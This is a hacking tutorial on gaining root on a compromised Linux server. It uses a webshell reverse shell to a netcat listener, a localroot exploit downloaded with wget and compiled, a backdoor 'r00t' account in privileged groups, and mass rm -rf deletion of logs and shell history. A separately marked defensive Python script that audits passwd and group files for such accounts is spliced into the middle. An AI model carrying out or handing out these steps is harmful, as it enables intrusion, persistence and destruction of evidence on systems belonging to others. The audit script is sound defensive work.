Hello guys, hope you all are doing great! Today I will explain how to root a Linux server with a localroot.
What is rooting?
Rooting is the process of exploiting the kernel to gain administrator (root) rights on servers.
Requirements:
  • Basic Unix/Linux Command Knowledge
  • Shell Access On Targeted Server
  • PHP WebShell With Backconnect Option (WSO 2.5 webshell)
  • A Localroot Exploit (localroot collection)
  • Netcat

Let's get started....


    [#] Backconnecting
    First of all you will need an open port on your router in order to backconnect. Information on port forwarding can be found HERE
    Open your command prompt/terminal, cd to the netcat path and type:
    nc -vlp 1337

    where 1337 is the open port on your router. It should then say:
    listening on [any] 1337 ...

    Now go to your webshell and navigate to "BackConnect Option". The backconnect option is located under Network in the provided WSO webshell. 
    Enter your port and click "Connect". 
    Now go back to the command prompt. If you see something like:
    sh: no job control in this shell

    it means we have successfully backconnected to the server. Now let's start rooting the box.


    [#] Choosing Localroot Exploit
    We will need a localroot exactly matching the kernel and the year it was built. The older the kernel, the better the chances of finding an exploit and rooting it. To check which kernel version it is using, execute the following:
    uname -rv

    It will give you something like:
    2.6.18-348.12.1.el5PAE #1 SMP Wed Jan 01 06:17:31 EDT 2013 i686 i686 i386 GNU/Linux

    Now choose a localroot matching the kernel and year from the localroot collection which I provided, or if you can't find it in the collection just google the kernel version and find an exploit.


    [#] Executing Localroot Exploit
    Upload the localroot via the webshell, or if you have it uploaded somewhere you can use the following command to download it to the server.
    wget http://www.site.com/localroot.c

    Now if your exploit has a .c extension you will have to compile it; otherwise just skip to the next step. For compiling:
    gcc filename.c -o outputfilename


    If you get a permission denied error, compile it locally or on another box and upload it to the server.
    Giving full permission to the file:
    chmod 0777 filename

    Finally executing the exploit:
    ./filename

    Now to check if you have got root execute the following:
    whoami

    If it says root, it means you have successfully rooted the server.


    [#] Adding New User
    The following command adds a new user named "r00t" on the server:
    adduser -g 0 r00t -G wheel,sys,bin,daemon,adm,disk -d /r00t -s /bin/sh

    Now give a password for the user r00t. Type:
    passwd r00t

    Enter a password, confirm it, and it should say:
    passwd: all authentication tokens updated successfully.

    Now you will be able to log in via PuTTY or any SSH client.
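
From the defender's side, the account created above leaves a footprint in /etc/passwd and /etc/group that does not depend on any log file: a non-root login account with primary GID 0 and membership in several system groups. The following is an added example, not part of the original post, that audits those two files for that pattern; the sample file contents, the function names and the baseline parameter are assumptions made for illustration.

```python
# Groups named in the post's adduser command; shells that block interactive login.
PRIVILEGED_GROUPS = {"wheel", "sys", "bin", "daemon", "adm", "disk"}
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}
# Constructed sample data for illustration (not taken from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
alice:x:500:500:Alice:/home/alice:/bin/bash
r00t:x:501:0::/r00t:/bin/sh
"""
SAMPLE_GROUP = """\
bin:x:1:bin,daemon,r00t
sys:x:3:bin,adm,r00t
adm:x:4:adm,daemon,r00t
disk:x:6:r00t
wheel:x:10:alice,r00t
"""

def privileged_memberships(group_text):
    """Map user -> set of privileged groups that list the user as a member."""
    members = {}
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] in PRIVILEGED_GROUPS:
            for user in filter(None, fields[3].split(",")):
                members.setdefault(user, set()).add(fields[0])
    return members

def audit_accounts(passwd_text, group_text, baseline=("root",)):
    """Return {user: [reasons]} for accounts outside the baseline with root-like rights."""
    members = privileged_memberships(group_text)
    findings = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or fields[0] in baseline:
            continue
        name, uid, gid, shell = fields[0], fields[2], fields[3], fields[6]
        can_login = shell not in NOLOGIN_SHELLS
        reasons = ["uid 0"] if uid == "0" else []  # a second uid 0 is flagged even without a shell
        if can_login and gid == "0":
            reasons.append("primary gid 0")
        if can_login and name in members:
            reasons.append("groups: " + ",".join(sorted(members[name])))
        if reasons:
            findings[name] = reasons
    return findings

if __name__ == "__main__":
    print(audit_accounts(SAMPLE_PASSWD, SAMPLE_GROUP, ("root", "sync")))
```

On a real host, pass in the contents of /etc/passwd and /etc/group together with a baseline of accounts you expect, since stock system accounts such as sync also have primary GID 0. Legitimate administrators in wheel (alice in the sample) are reported too, so the output is a review list to compare against known-good state.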


    [#] Clearing Logs
    Now it's time to clear our logs. Execute the following:
    rm -rf /tmp/logs
    rm -rf $HISTFILE
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_history
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_logout
    rm -rf /usr/local/apache/logs
    rm -rf /usr/local/apache/log
    rm -rf /var/apache/logs
    rm -rf /var/apache/log
    rm -rf /var/run/utmp
    rm -rf /var/logs
    rm -rf /var/log
    rm -rf /var/adm
    rm -rf /etc/wtmp
    rm -rf /etc/utmp
    find / -name *.bash_history -exec rm -rf {} \;
    find / -name *.bash_logout -exec rm -rf {} \;
    find / -name "log*" -exec rm -rf {} \;
    find / -name *.log -exec rm -rf {} \;
    Note: Rooting a box you don't own is illegal; this information is for educational purposes only.
    Stay safe and gud luck!
